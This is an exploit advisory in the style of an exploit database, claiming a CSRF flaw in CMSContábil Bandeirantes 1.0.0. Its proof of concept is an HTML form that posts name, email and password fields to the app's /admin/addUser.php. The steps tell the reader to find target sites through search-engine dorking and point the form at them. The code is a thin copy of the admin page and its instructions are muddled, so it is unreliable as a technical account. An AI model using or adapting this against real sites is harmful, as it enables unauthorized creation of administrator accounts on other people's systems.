======================================================================================================================================
| # Title     : CMSContábil Bandeirantes V 1.0.0 CSRF Vulnerability                                                                  |
| # Author    : indoushka                                                                                                            |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                              |
| # Vendor    : https://scriptmafia.org/                                                                                             |  
======================================================================================================================================

poc :

[+] Dorking Ä°n Google Or Other Search Enggine .

[+] Go to the line 12.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/addUser.php 

[+] Save code as poc.html 

<section id="main" class="column" style="height: 680px;">
		
		<h4 class="alert_info">Necessário preencher todos os campos.</h4>
				<!--<h4 class="alert_warning">A Warning Alert</h4>
		
		<h4 class="alert_error">An Error Message</h4>
		
		<h4 class="alert_success">A Success Message</h4>-->
		

		<article class="module width_full">
			<form action="http://127.0.0.1/cbandeirantescombr/admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">
				<header><h3>Adicionar Usuários</h3></header>
					
						<div class="module_content">
								<fieldset>
									<label>Nome</label>
									<input name="nome" id="nome" value="" type="text">
								</fieldset>
								<fieldset>
									<label>Email</label>
									<input name="email" id="email" value="" type="text">
								</fieldset>
								<fieldset>
									<label>Senha</label>
									<input name="senha" id="senha" value="" type="text">
								</fieldset>
								<div class="clear"></div>
						</div>	
				<footer>
					<div class="submit_link">
						<input id="limpar" name="limpar" value="limpar" type="submit">
						<input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">
					</div>
				</footer>
			</form>	
		</article><!-- end of post new article -->
		
		
		
		
		<div class="spacer"></div>
	</section>
	

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |
=======================================================================================================================================